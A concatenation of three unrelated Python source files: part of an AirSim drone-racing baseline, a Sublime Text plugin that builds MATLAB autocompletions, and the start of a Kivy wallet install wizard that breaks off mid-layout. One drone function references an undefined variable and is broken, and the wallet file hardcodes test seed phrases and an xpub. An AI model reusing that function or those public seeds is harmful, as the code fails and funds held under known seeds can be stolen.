kp_z_track = 2.0, kd_z_track = 0.0,
kp_vel_z = 0.4, kd_vel_z = 0.0,
kp_yaw = 3.0, kd_yaw = 0.1)
self.airsim_client.setTrajectoryTrackerGains(traj_tracker_gains, vehicle_name=self.drone_name)
time.sleep(0.2)
def takeoffAsync(self):
self.airsim_client.takeoffAsync().join()
# like takeoffAsync(), but with moveOnSpline()
def takeoff_with_moveOnSpline(self, takeoff_height = 1.0):
start_position = self.airsim_client.simGetVehiclePose(vehicle_name=self.drone_name).position
takeoff_waypoint = airsim.Vector3r(start_position.x_val, start_position.y_val, start_position.z_val-takeoff_height)
self.airsim_client.moveOnSplineAsync([takeoff_waypoint], vel_max=15.0, acc_max=5.0, add_position_constraint=True, add_velocity_constraint=False,
add_acceleration_constraint=False, viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name).join()
# stores gate ground truth poses as a list of airsim.Pose() objects in self.gate_poses_ground_truth
def get_ground_truth_gate_poses(self):
gate_names_sorted_bad = sorted(self.airsim_client.simListSceneObjects("Gate.*"))
# gate_names_sorted_bad is of the form `GateN_GARBAGE`. for example:
# ['Gate0', 'Gate10_21', 'Gate11_23', 'Gate1_3', 'Gate2_5', 'Gate3_7', 'Gate4_9', 'Gate5_11', 'Gate6_13', 'Gate7_15', 'Gate8_17', 'Gate9_19']
# we sort them by their ibdex of occurence along the race track(N), and ignore the unreal garbage number after the underscore(GARBAGE)
gate_indices_bad = [int(gate_name.split('_')[0][4:]) for gate_name in gate_names_sorted_bad]
gate_indices_correct = sorted(range(len(gate_indices_bad)), key=lambda k: gate_indices_bad[k])
gate_names_sorted = [gate_names_sorted_bad[gate_idx] for gate_idx in gate_indices_correct]
print(gate_names_sorted)
self.gate_poses_ground_truth = []
for gate_name in gate_names_sorted:
curr_pose = self.airsim_client.simGetObjectPose(gate_name)
counter = 0
while (math.isnan(curr_pose.position.x_val) or math.isnan(curr_pose.position.y_val) or math.isnan(curr_pose.position.z_val)) and (counter < self.MAX_NUMBER_OF_GETOBJECTPOSE_TRIALS):
print("DEBUG: gate ",gate_name," position is nan, retrying...")
counter += 1
curr_pose = self.airsim_client.simGetObjectPose(gate_name)
assert not math.isnan(curr_pose.position.x_val), f"ERROR: {gate_name} curr_pose.position.x_val is still {curr_pose.position.x_val} after {counter} trials"
assert not math.isnan(curr_pose.position.y_val), f"ERROR: {gate_name} curr_pose.position.y_val is still {curr_pose.position.y_val} after {counter} trials"
assert not math.isnan(curr_pose.position.z_val), f"ERROR: {gate_name} curr_pose.position.z_val is still {curr_pose.position.z_val} after {counter} trials"
self.gate_poses_ground_truth.append(curr_pose)
# this is utility function to get a velocity constraint which can be passed to moveOnSplineVelConstraints()
# the "scale" parameter scales the gate facing vector accordingly, thereby dictating the speed of the velocity constraint
def get_gate_facing_vector_from_quaternion(self, airsim_quat, scale = 1.0):
import numpy as np
# convert gate quaternion to rotation matrix.
# ref: https://en.wikipedia.org/wiki/Rotation_matrix#Quaternion; https://www.lfd.uci.edu/~gohlke/code/transformations.py.html
q = np.array([airsim_quat.w_val, airsim_quat.x_val, airsim_quat.y_val, airsim_quat.z_val], dtype=np.float64)
n = np.dot(q, q)
if n < np.finfo(float).eps:
return airsim.Vector3r(0.0, 1.0, 0.0)
q *= np.sqrt(2.0 / n)
q = np.outer(q, q)
rotation_matrix = np.array([[1.0-q[2, 2]-q[3, 3], q[1, 2]-q[3, 0], q[1, 3]+q[2, 0]],
[ q[1, 2]+q[3, 0], 1.0-q[1, 1]-q[3, 3], q[2, 3]-q[1, 0]],
[ q[1, 3]-q[2, 0], q[2, 3]+q[1, 0], 1.0-q[1, 1]-q[2, 2]]])
gate_facing_vector = rotation_matrix[:,1]
return airsim.Vector3r(scale * gate_facing_vector[0], scale * gate_facing_vector[1], scale * gate_facing_vector[2])
def fly_through_all_gates_one_by_one_with_moveOnSpline(self):
if self.level_name == "Building99_Hard":
vel_max = 5.0
acc_max = 2.0
if self.level_name in ["Soccer_Field_Medium", "Soccer_Field_Easy", "ZhangJiaJie_Medium"] :
vel_max = 10.0
acc_max = 5.0
print("fly_through_all_gates_one_by_one_with_moveOnSpline: WHERE DOES gate_pose COME FROM?")
return self.airsim_client.moveOnSplineAsync([gate_pose.position], vel_max=vel_max, acc_max=acc_max,
add_position_constraint=True, add_velocity_constraint=False, add_acceleration_constraint=False, viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name)
def fly_through_all_gates_at_once_with_moveOnSpline(self):
if self.level_name in ["Soccer_Field_Medium", "Soccer_Field_Easy", "ZhangJiaJie_Medium", "Qualifier_Tier_1", "Qualifier_Tier_2", "Qualifier_Tier_3"] :
vel_max = 30.0
acc_max = 15.0
if self.level_name == "Building99_Hard":
vel_max = 4.0
acc_max = 1.0
return self.airsim_client.moveOnSplineAsync([gate_pose.position for gate_pose in self.gate_poses_ground_truth], vel_max=vel_max, acc_max=acc_max,
add_position_constraint=True, add_velocity_constraint=False, add_acceleration_constraint=False, viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name)
def fly_through_all_gates_one_by_one_with_moveOnSplineVelConstraints(self):
add_velocity_constraint = True
add_acceleration_constraint = False
if self.level_name in ["Soccer_Field_Medium", "Soccer_Field_Easy"] :
vel_max = 15.0
acc_max = 3.0
speed_through_gate = 2.5
if self.level_name == "ZhangJiaJie_Medium":
vel_max = 10.0
acc_max = 3.0
speed_through_gate = 1.0
if self.level_name == "Building99_Hard":
vel_max = 2.0
acc_max = 0.5
speed_through_gate = 0.5
add_velocity_constraint = False
# scale param scales the gate facing vector by desired speed.
return self.airsim_client.moveOnSplineVelConstraintsAsync([gate_pose.position],
[self.get_gate_facing_vector_from_quaternion(gate_pose.orientation, scale = speed_through_gate)],
vel_max=vel_max, acc_max=acc_max,
add_position_constraint=True, add_velocity_constraint=add_velocity_constraint, add_acceleration_constraint=add_acceleration_constraint,
viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name)
def fly_through_all_gates_at_once_with_moveOnSplineVelConstraints(self):
if self.level_name in ["Soccer_Field_Easy", "Soccer_Field_Medium", "ZhangJiaJie_Medium"]:
vel_max = 15.0
acc_max = 7.5
speed_through_gate = 2.5
if self.level_name == "Building99_Hard":
vel_max = 5.0
acc_max = 2.0
speed_through_gate = 1.0
return self.airsim_client.moveOnSplineVelConstraintsAsync([gate_pose.position for gate_pose in self.gate_poses_ground_truth],
[self.get_gate_facing_vector_from_quaternion(gate_pose.orientation, scale = speed_through_gate) for gate_pose in self.gate_poses_ground_truth],
vel_max=vel_max, acc_max=acc_max,
add_position_constraint=True, add_velocity_constraint=True, add_acceleration_constraint=False,
viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name)
def image_callback(self):
# get uncompressed fpv cam image
request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]
response = self.airsim_client_images.simGetImages(request)
img_rgb_1d = np.fromstring(response[0].image_data_uint8, dtype=np.uint8)
img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)
if self.viz_image_cv2:
cv2.imshow("img_rgb", img_rgb)
cv2.waitKey(1)
def odometry_callback(self):
print("odometry callback")
self.state = self.airsim_client_odom.getMultirotorState()
# in world frame:
# position = drone_state.kinematics_estimated.position
# orientation = drone_state.kinematics_estimated.orientation
# linear_velocity = drone_state.kinematics_estimated.linear_velocity
# angular_velocity = drone_state.kinematics_estimated.angular_velocity
# call task() method every "period" seconds.
def repeat_timer_image_callback(self, task, period):
while self.is_image_thread_active:
task()
time.sleep(period)
def repeat_timer_odometry_callback(self, task, period):
while self.is_odometry_thread_active:
task()
time.sleep(period)
def start_image_callback_thread(self):
if not self.is_image_thread_active:
self.is_image_thread_active = True
self.image_callback_thread.start()
print("Started image callback thread")
def stop_image_callback_thread(self):
if self.is_image_thread_active:
self.is_image_thread_active = False
self.image_callback_thread.join()
print("Stopped image callback thread.")
def start_odometry_callback_thread(self):
if not self.is_odometry_thread_active:
self.is_odometry_thread_active = True
self.odometry_callback_thread.start()
print("Started odometry callback thread")
def stop_odometry_callback_thread(self):
if self.is_odometry_thread_active:
self.is_odometry_thread_active = False
self.odometry_callback_thread.join()
print("Stopped odometry callback thread.")
def controller_log(log_string):
print("CONTROLLER: ", log_string)
def main(args):
# ensure you have generated the neurips planning settings file by running python generate_settings_file.py
baseline_racer = BaselineRacer(drone_name="drone_1", viz_traj=args.viz_traj, viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0], viz_image_cv2=args.viz_image_cv2)
baseline_racer.load_level(args.level_name)
baseline_racer.get_ground_truth_gate_poses()
if args.level_name == "Qualifier_Tier_1":
args.race_tier = 1
if args.level_name == "Qualifier_Tier_2":
args.race_tier = 2
if args.level_name == "Qualifier_Tier_3":
args.race_tier = 3
baseline_racer.start_race(args.race_tier)
baseline_racer.initialize_drone()
baseline_racer.takeoff_with_moveOnSpline()
# baseline_racer.get_ground_truth_gate_poses()
baseline_racer.start_image_callback_thread()
baseline_racer.start_odometry_callback_thread()
if args.planning_baseline_type == "all_gates_at_once" :
if args.planning_and_control_api == "moveOnSpline":
baseline_racer.fly_through_all_gates_at_once_with_moveOnSpline().join()
if args.planning_and_control_api == "moveOnSplineVelConstraints":
baseline_racer.fly_through_all_gates_at_once_with_moveOnSplineVelConstraints().join()
if args.planning_baseline_type == "all_gates_one_by_one":
if args.planning_and_control_api == "moveOnSpline":
baseline_racer.fly_through_all_gates_one_by_one_with_moveOnSpline().join()
if args.planning_and_control_api == "moveOnSplineVelConstraints":
baseline_racer.fly_through_all_gates_one_by_one_with_moveOnSplineVelConstraints().join()
baseline_racer.stop_image_callback_thread()
baseline_racer.stop_odometry_callback_thread()
baseline_racer.reset_race()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--level_name', type=str, choices=["Soccer_Field_Easy", "Soccer_Field_Medium", "ZhangJiaJie_Medium", "Building99_Hard",
"Qualifier_Tier_1", "Qualifier_Tier_2", "Qualifier_Tier_3"], default="ZhangJiaJie_Medium")
parser.add_argument('--planning_baseline_type', type=str, choices=["all_gates_at_once","all_gates_one_by_one"], default="all_gates_at_once")
parser.add_argument('--planning_and_control_api', type=str, choices=["moveOnSpline", "moveOnSplineVelConstraints"], default="moveOnSpline")
parser.add_argument('--enable_viz_traj', dest='viz_traj', action='store_true', default=False)
parser.add_argument('--enable_viz_image_cv2', dest='viz_image_cv2', action='store_true', default=False)
parser.add_argument('--race_tier', type=int, choices=[1,2,3], default=1)
args = parser.parse_args()
main(args)
|
am_completions_generate.py
|
import re
from os import listdir, walk, makedirs
from os.path import isdir, isfile, join, split
import errno
import json
import pickle
import collections
import time
import threading
import sublime
import sublime_plugin
def plugin_loaded():
"""Do imports that need to wait for Sublime API initilization
"""
global config, abspath, mfun
import AutoMatlab.lib.config as config
from AutoMatlab.lib.abspath import abspath
from AutoMatlab.lib.mfun import mfun
def process_signature(signature):
"""Process a functionSignatures.json file to extract Matlab function names
from it.
Although functionSignatures.json contains the autocompletion information
that Matlab natively uses, only the function names are extracted from this
file by AutoMatlab. The reason is that the autocompletion information in
functionSignatures.json is very inconsistent and incomplete.
"""
if not isfile(signature):
return []
# read as string data
with open(signature) as fh:
data = fh.read()
# remove comments, as the python json parses has issues with those
pattern = r'\/\/.*'
data = re.sub(pattern, '', data)
# remove linebreak in multiline strings, as they are not standard json
pattern = r'\.\.\.\s+'
data = re.sub(pattern, '', data)
# place comma's between sequences of strings, as this is required for json
pattern = r'"\s+"'
data = re.sub(pattern, '","', data)
# # read json with custom decoder, to retain duplicate keys
# decoder = json.JSONDecoder(object_pairs_hook=lambda x: tuple(x))
# signatures = decoder.decode(data)
# read json
try:
fun_dict = json.loads(data)
except:
msg = '[WARNING] AutoMatlab - Failed to decode json file: ' + signature
# print(msg)
return []
# extract all function names
funs = []
for fun in fun_dict.keys():
funs.append(fun)
return funs
def process_contents(contents):
"""Process a Contents.m file to extract Matlab function names from it.
This function expects the default Matlab structure of Contents.m files.
Unfortunately, this structure is not always faithfully applied, in which
case AutoMatlab won't recognize the functions.
"""
if not isfile(contents):
return []
# read data line by line
funs = []
with open(contents, encoding='cp1252') as fh:
try:
line = fh.readline()
except:
return funs
while line:
# interrupt at copyright message
if 'copyright' in line.lower():
break
# extract function name
pattern = r'^\s*%\s*(\w+)\s+-'
mo = re.search(pattern, line)
if mo:
funs.append(mo.group(1))
# read next line
try:
line = fh.readline()
except:
return funs
return funs
def process_pathdef(matlab_pathdef_path, matlabroot):
"""Process pathdef.m file to extract all directories in the Matlab path.
"""
matlab_path_dirs = []
abs_dir_regex = re.compile(r"'(.+);'")
rel_dir_regex = re.compile(r"'[\\\/]*(.+);'")
# open pathdef file
with open(matlab_pathdef_path, encoding='cp1252') as fh:
line = fh.readline()
process_line = False
# read line by line
while line:
# stop processing at END ENTRIES
if 'END ENTRIES' in line:
break
# process lines containing directories
if process_line:
if 'matlabroot' in line:
# ensure dir is extracted as relative dir
mo = rel_dir_regex.search(line)
if mo:
matlab_path_dirs.append(
abspath(mo.group(1), matlabroot))
else:
# read dir as absolute dir
mo = abs_dir_regex.search(line)
if mo:
matlab_path_dirs.append(abspath(mo.group(1)))
# start processing at BEGIN ENTRIES
if 'BEGIN ENTRIES' in line:
process_line = True
# read next line
line = fh.readline()
return matlab_path_dirs
class GenerateAutoMatlabCompletionsCommand(sublime_plugin.WindowCommand):
"""Generate Matlab autocompletion information by parsing the
current Matlab installation.
"""
def __init__(self, window):
"""Initialize threads for completion generation
"""
super().__init__(window)
# prepare a (probably unnecessary) thread lock
self.lock = threading.Lock()
self.finished = True
self.n_completions = 0
self.matlabroot = ''
def run(self):
"""Start threads for generating matlab completion
"""
# prevent simultaneous threads for matlab completion generation
self.lock.acquire()
finished = self.finished
if finished:
self.finished = False
self.lock.release()
if finished:
# run threads to generate matlab completions
self.error = False
threading.Thread(target=self.show_status).start()
threading.Thread(target=self.generate_completions).start()
else:
msg = '[INFO] AutoMatlab - Matlab completions are already ' \
'being generated'
# print(msg)
self.window.status_message(msg)
def show_status(self):
"""Show status bar indicator for ongoing completion generation
"""
busy = True
while busy:
# create moving status bar position
pos = abs(int(time.time() % 1.5 * 4) - 3)
msg = "[{}] AutoMatlab - Generating Matlab completions. " \
"This might take several minutues.".format(
" " * pos + "=" + " " * (3 - pos))
self.window.status_message(msg)
time.sleep(0.125)
# check if matlab completion generation finished
self.lock.acquire()
if self.finished:
busy = False
if not self.error:
msg = '[INFO] AutoMatlab - Found {}'.format(
self.n_completions) + ' Matlab function completions'
print(msg)
self.window.status_message(msg)
self.lock.release()
def generate_completions(self):
"""Generate matlab completions
"""
self.matlab_completions = {}
# read settings
settings = sublime.load_settings('AutoMatlab.sublime-settings')
include_dirs = settings.get('include_dirs', [])
exclude_dirs = settings.get('exclude_dirs', [])
exclude_patterns = settings.get('exclude_patterns', [])
use_contents_files = settings.get('use_contents_files', 'dir')
use_signatures_files = settings.get('use_signatures_files', 'dir')
use_matlab_path = settings.get('use_matlab_path', 'ignore')
self.matlabroot = settings.get('matlabroot', 'default')
if self.matlabroot == 'default':
self.matlabroot = config.DEFAULT_MATLABROOT
else:
self.matlabroot = abspath(self.matlabroot)
matlab_pathdef_path = settings.get('matlab_pathdef_path', 'default')
if matlab_pathdef_path == 'default':
matlab_pathdef_path = config.DEFAULT_MATLAB_PATHDEF_PATH
matlab_pathdef_path = abspath(matlab_pathdef_path, self.matlabroot)
# assertions
try:
assert type(self.matlabroot) == str, \
"[ERROR] AutoMatlab - Matlabroot is not of type 'str'"
assert type(matlab_pathdef_path) == str, \
"[ERROR] AutoMatlab - Matlab_pathdef_path is not of type 'str'"
assert type(include_dirs) == list, \
"[ERROR] AutoMatlab - Include_dirs is not of type 'list'"
assert type(exclude_dirs) == list, \
"[ERROR] AutoMatlab - Exclude_dirs is not of type 'list'"
assert type(exclude_patterns) == list, \
"[ERROR] AutoMatlab - Exclude_patterns is not of type 'list'"
assert use_contents_files in ['dir', 'read', 'ignore'], \
"[ERROR] AutoMatlab - Invalid value for 'use_contents_files'"
assert use_signatures_files in ['dir', 'read', 'ignore'], \
"[ERROR] AutoMatlab - Invalid value for 'use_signatures_files'"
assert use_matlab_path in ['dir', 'read', 'ignore'], \
"[ERROR] AutoMatlab - Invalid value for 'use_signatures_files'"
except Exception as e:
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
self.window.status_message(str(e))
raise e
return
# check matlabroot
if not isfile(join(str(self.matlabroot), 'bin', 'matlab.exe')):
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
msg = '[ERROR] AutoMatlab - Matlab installation could not be' \
'found at specified location'
self.window.status_message(msg)
raise Exception(msg)
return
# process include/exclude dirs
include_dirs = abspath(include_dirs, self.matlabroot)
exclude_dirs = abspath(exclude_dirs, self.matlabroot)
# read the matlab path and parse its dirs
if use_matlab_path in ['dir', 'read']:
# check pathdef file
if not isfile(matlab_pathdef_path):
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
msg = '[ERROR] AutoMatlab - Specified pathdef.m is invalid'
self.window.status_message(msg)
raise Exception(msg)
return
# get dirs in matlab path
matlab_path_dirs = process_pathdef(matlab_pathdef_path,
self.matlabroot)
# parse dirs in matlab path
for path_dir in matlab_path_dirs:
if isdir(path_dir):
# apply exclude dirs and patterns
if any([excl for excl in exclude_dirs
if path_dir.startswith(excl)]) \
or any([excl for excl in exclude_patterns
if excl in path_dir]):
continue
# process files in path dir
for file in listdir(path_dir):
self.compose_completion(mfun(join(path_dir, file)))
# walk through files of matlab toolboxes
for root, dirs, files in walk(join(self.matlabroot, 'toolbox')):
# apply exclude dirs and patterns
if any([excl for excl in exclude_dirs if root.startswith(excl)]) \
or any([excl for excl in exclude_patterns if excl in root]):
continue
# process entire dirs
if (use_signatures_files == 'dir'
and config.SIGNATURES_NAME in files) \
or (use_contents_files == 'dir'
and config.CONTENTS_NAME in files):
for file in files:
self.compose_completion(mfun(join(root, file)))
continue
# process signature files
if use_signatures_files == 'read' \
and config.SIGNATURES_NAME in files:
for fun in process_signature(
join(root, config.SIGNATURES_NAME)):
self.compose_completion(mfun(join(root, fun + '.m')))
# process contents files
if use_contents_files == 'read'\
and config.CONTENTS_NAME in files:
for fun in process_contents(
join(root, config.CONTENTS_NAME)):
self.compose_completion(mfun(join(root, fun + '.m')))
# parse custom include dirs
for include in include_dirs:
# check wildcard
if not include:
continue
wildcard = include[-1]
if wildcard in ['+', '*']:
include = include[:-1]
for root, dirs, files in walk(include):
# extract completion from file
for f in files:
self.compose_completion(mfun(join(root, f)))
# set which subdirs to include
if wildcard == '+':
# only include package dirs and apply exclude dirs/patterns
dirs[:] = \
[d for d in dirs
if d.startswith('+')
and not(any([excl for excl in exclude_dirs
if abspath(d, root).startswith(excl)])
or any([excl for excl in exclude_patterns
if excl in d and not excl == "+"]))]
elif wildcard == '*':
# apply exclude dirs/patterns
dirs[:] = \
[d for d in dirs
if not(any([excl for excl in exclude_dirs
if abspath(d, root).startswith(excl)])
or any([excl for excl in exclude_patterns
if excl in d]))]
else:
# exclude all
dirs[:] = []
# sort results
sorted_matlab_completions = collections.OrderedDict(
sorted(self.matlab_completions.items()))
# get store path
storage_path = abspath(config.MATLAB_COMPLETIONS_PATH,
sublime.packages_path())
try:
# make storage dir if non-existent
makedirs(split(storage_path)[0])
except OSError as e:
if e.errno != errno.EEXIST:
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
self.window.status_message(str(e))
raise e
return
except Exception as e:
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
self.window.status_message(str(e))
raise e
return
# store results
with open(storage_path, 'bw') as fh:
pickle.dump(sorted_matlab_completions, fh)
self.lock.acquire()
self.n_completions = len(self.matlab_completions)
self.finished = True
self.lock.release()
def compose_completion(self, mfun_data):
"""Compose completion and add to completions dictionary
"""
if not mfun_data.valid:
return
# add data to matlab completions
if mfun_data.path.startswith(self.matlabroot + '\\'):
crop = len(self.matlabroot) + 1
else:
crop = 0
self.matlab_completions[mfun_data.fun.lower()] = \
[mfun_data.fun, mfun_data.annotation, mfun_data.path[crop:]]
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum_vestx.base_wizard import BaseWizard
from electrum_vestx.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_vestx.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum_vestx/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum_vestx/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: 1, 1, 1, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0.525, 0.0, 0.325, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
canvas.before:
Rectangle:
size: Window.size
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'VESTX ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum_vestx/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum_vestx/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum_vestx/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
